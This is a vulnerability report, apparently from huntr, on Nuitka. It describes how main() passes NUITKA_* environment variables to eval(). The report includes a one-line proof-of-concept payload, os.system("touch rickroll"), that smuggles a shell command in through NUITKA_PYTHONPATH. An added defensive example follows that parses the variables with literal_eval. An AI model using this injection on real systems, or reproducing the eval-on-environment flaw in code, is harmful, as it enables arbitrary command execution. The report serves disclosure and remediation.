huntr / Whokilleddb / EA4A842C-C48C-4AAE-A599-3305125C63A7
History Jun 04, 2022 - 11:47 a.m.

Contextual Code Execution

2022-06-04 11:47:46
whokilleddb
www.huntr.dev
10

EPSS: 0.003 (Low)
Percentile: 71.6%

Description

The main() function passes the values of the NUITKA_PYTHONPATH, NUITKA_NAMESPACES and NUITKA_PTH_IMPORTED environment variables to eval(), which can lead to contextual code execution: an attacker who can set any of these variables to a malicious payload string can gain access to a system and execute commands with the privileges of the running program. This can lead to backdoors, reverse shells or reading/writing to privileged files.

One example of a similar vulnerability is CVE-2022-0845 in the popular pytorch-lightning repository. [See References]

Proof of Concept

  • Set malicious payload
$ export NUITKA_PYTHONPATH='os.system("touch rickroll")'
  • Run nuitka/__main__.py
  • Code gets executed!
$ ls rickroll
rickroll
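
One way to read such variables without evaluating them as code, shown as an added example (not Nuitka's code and not part of the original report). It assumes each variable is meant to hold a Python literal list of strings; the helper names and sample values are constructed for illustration.

```python
import ast
import os

# Variable names come from the report; the expected value shape (a literal
# list of strings) is an assumption made for this example.
ENV_VARS = ("NUITKA_PYTHONPATH", "NUITKA_NAMESPACES", "NUITKA_PTH_IMPORTED")


def load_literal_list(name, environ=os.environ):
    """Parse environ[name] as a list of strings without executing code.

    Returns None when the variable is unset; raises ValueError when the
    value is not a plain literal of the expected shape.
    """
    raw = environ.get(name)
    if raw is None:
        return None
    try:
        # literal_eval accepts only literals (strings, numbers, lists, ...);
        # calls, attribute access and bare names are rejected, not run.
        value = ast.literal_eval(raw)
    except (ValueError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError(f"{name}: not a Python literal") from exc
    if not isinstance(value, (list, tuple)) or not all(
        isinstance(item, str) for item in value
    ):
        raise ValueError(f"{name}: expected a list of strings")
    return list(value)


def audit(environ):
    """Return {name: 'ok' | 'unset' | 'rejected'} for each variable."""
    result = {}
    for name in ENV_VARS:
        try:
            parsed = load_literal_list(name, environ)
            result[name] = "unset" if parsed is None else "ok"
        except ValueError:
            result[name] = "rejected"
    return result


if __name__ == "__main__":
    # Constructed environment; the first value is the PoC string from above.
    sample = {
        "NUITKA_PYTHONPATH": 'os.system("touch rickroll")',
        "NUITKA_NAMESPACES": "['pkg_a', 'pkg_b']",
    }
    print(audit(sample))
```
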
